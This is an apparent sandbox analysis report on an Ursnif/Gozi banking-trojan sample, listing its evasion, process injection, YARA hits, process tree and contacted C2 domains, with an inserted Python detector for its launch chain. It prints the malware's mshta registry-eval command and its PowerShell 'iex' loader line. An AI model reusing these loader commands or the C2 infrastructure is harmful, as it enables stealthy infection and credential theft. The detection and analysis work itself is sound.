Source: explorer.exe, 00000024.00000002.504744729.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001B.00000003.420802622.0000017D2F3E6000.00000004.00000001.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000024.00000002.504777682.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW:\x1
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E1CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E1CF6
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0602556E
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E510D40 mov eax, dword ptr fs:[00000030h] 0_2_6E510D40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E510C76 mov eax, dword ptr fs:[00000030h] 0_2_6E510C76
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E51087D push dword ptr fs:[00000030h] 0_2_6E51087D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4F0C05 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_6E4F0C05
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E3838 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E4E3838
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E1CF6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E1CF6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E797C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6E4E797C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06001F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_06001F12

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 5A0000 protect: page execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3412 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7FA6A12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 5A0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7FA6A12E0 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000002.494191658.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.473604486.0000000001600000.00000002.00000001.sdmp, rundll32.exe, 00000001.00000002.474194963.0000000003840000.00000002.00000001.sdmp, explorer.exe, 00000024.00000000.458041713.0000000001980000.00000002.00000001.sdmp, control.exe, 00000025.00000002.473939310.00000234DCB90000.00000002.00000001.sdmp Binary or memory string: Progmanlock
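Detection logic for the launch chain recorded in this section: mshta.exe spawning powershell.exe (the "MSHTA Spawning Windows Shell" condition the report cites), the inline about:<hta:application> body on the mshta.exe command line, the payload read back from HKCU\Software\AppDataLow\Software\Microsoft\<GUID> (regread in the HTA, gp in PowerShell), and powershell.exe driving csc.exe. This is an added example, not part of the sandbox report and not the Sigma rule itself: the events are constructed here from the command lines listed above in a Sysmon Event ID 1-like shape, PIDs other than 3888 are hypothetical, and the rule names and the key-extraction helper are the example's own.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Process-creation event in a Sysmon Event ID 1-like shape (constructed)."""
    pid: int
    ppid: int
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    cmdline: str


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


# Interpreters whose creation by mshta.exe is the "MSHTA spawning a shell"
# condition. Rule names in this example are the example's own.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# The per-bot key the loader reads its payload from:
# HKCU\Software\AppDataLow\Software\Microsoft\<GUID>. "One or more backslashes"
# covers both the "HKCU:Software\..." drive form used with gp and the escaped
# "HKCU\\\Software\\..." form inside the HTA script.
_APPDATALOW_RE = re.compile(
    r"AppDataLow\\+Software\\+Microsoft\\+"
    r"([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def extract_registry_key(cmdline: str):
    """Return the normalized AppDataLow key referenced by a command line, or None."""
    m = _APPDATALOW_RE.search(cmdline)
    if not m:
        return None
    return r"HKCU\Software\AppDataLow\Software\Microsoft" + "\\" + m.group(1).upper()


def analyze(events):
    """Run the four checks over a list of ProcEvent and return the findings."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        cl = ev.cmdline.lower()
        if parent == "mshta.exe" and img in SHELLS:
            findings.append(Finding(ev.pid, "mshta_spawns_shell", f"{parent} -> {img}"))
        if "about:<hta:application>" in cl:
            findings.append(Finding(ev.pid, "inline_hta_launcher", "HTA body supplied on the command line"))
        key = extract_registry_key(ev.cmdline)
        if key and ("regread(" in cl or " gp " in cl or "get-itemproperty" in cl):
            findings.append(Finding(ev.pid, "registry_resident_payload", key))
        if parent == "powershell.exe" and img == "csc.exe":
            findings.append(Finding(ev.pid, "powershell_compiles_csharp", ev.cmdline))
    return findings


def rules_by_pid(events):
    """Map each PID to the set of rule names that fired on it."""
    out = {}
    for f in analyze(events):
        out.setdefault(f.pid, set()).add(f.rule)
    return out


# Constructed sample events built from the command lines in this report.
# 3888 is the powershell.exe PID the report names; the other PIDs are hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(5000, 900, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r"mshta.exe about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell')"
              r".regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));"
              r"if(!window.flag)close()</script>"),
    ProcEvent(3888, 5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\mshta.exe",
              r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"),
    ProcEvent(5200, 3888, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline'"),
    # Benign control (constructed): a logon script launched from explorer.exe.
    ProcEvent(6000, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} {f.detail}")
```

The registry key the helper returns is the triage handle on a live host: the loader keeps both the HTA launcher (Actidsrv) and the PowerShell stage (basebapi) under that key, so exporting the key and ASCII-decoding its values recovers the stages without waiting for another execution.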

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EA12A cpuid 1_2_032EA12A
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E4D111B
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 0_2_6E4E98AA
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 0_2_6E4E938D
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 0_2_6E4E9782
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesA, 0_2_6E4E9843
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 0_2_6E4F080B
Source: C:\Windows\System32\loaddll32.exe Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA, 0_2_6E4F083F
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,__invoke_watson,__itoa_s, 0_2_6E4E98E6
Source: C:\Windows\System32\loaddll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_6E4E94A4
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6E4F097E
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen, 0_2_6E4E953C
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_6E4ED9FC
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06005F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_06005F90
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D116D GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E4D116D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_032EA12A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D1756 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E4D1756
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Behavior Graph:

Behavior Graph ID: 355490, Sample: SecuriteInfo.com.BScope.Tro..., Startdate: 19/02/2021, Architecture: WINDOWS, Score: 100

Top-level network: c56.lepini.at, resolver1.opendns.com, 2 other IPs or domains
Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

Process tree recovered from the graph (signatures and dropped files in brackets):

loaddll32.exe
  rundll32.exe [Detected Gozi e-Banking trojan; Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures]
    control.exe
mshta.exe [Suspicious powershell command line found]
  powershell.exe [Compiles code for process injection (via .Net compiler); Creates a thread in another existing process (thread injection); dropped C:\Users\user\AppData\Local\...\vkjmiujf.0.cs, UTF-8]
    csc.exe [dropped C:\Users\user\AppData\Local\...\vy454zdn.dll, PE32]
      cvtres.exe
    csc.exe [dropped C:\Users\user\AppData\Local\...\vkjmiujf.dll, PE32]
      cvtres.exe
    conhost.exe
    explorer.exe (injected)
iexplore.exe
  iexplore.exe (three instances; one connects to api10.laptok.at 34.65.15.6 on ports 49734, 49735, 49736, GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States)

Contacted Public IPs

IP          Domain   Country        ASN     ASN Name                               Malicious
34.65.15.6  unknown  United States  139070  GOOGLE-AS-APGoogleAsiaPacificPteLtdSG  true

Contacted Domains

Name IP Active
c56.lepini.at 34.65.15.6 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 34.65.15.6 true
api10.laptok.at 34.65.15.6 true

Contacted URLs

Name: http://api3.lepini.at/api1/HU2djjPvb8/3wTlevSrhaAhqj4Dd/_2FcnSXv37d6/lM3ay6ZyaF8/vzW2j5F6PCwbE2/5l1s0lalymuTZiQlrp1pk/siUYecp572aSkE1V/2s_2FqU5M39UKJJ/2AQbTY2p92Z6dpvNa0/A0KgQJiEZ/0_2FQT0WnjqaGoOUQLde/79w4eQg7V4tsTUU2owV/0VfGdBtsx_2BzPx5gEeSGQ/aortk5dEfSnNB/xndmgTyL/7wyLkKjs3enFFIe0bTY0HgG/EFiqNY6tyU/u33X0URZ7yfG_2Fqz/JtECL_2FwAWH/bZAwUzYcsqt/GeFhKrDcv1fANK/NTdyyO3l5t0m1tSTD/fAo
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown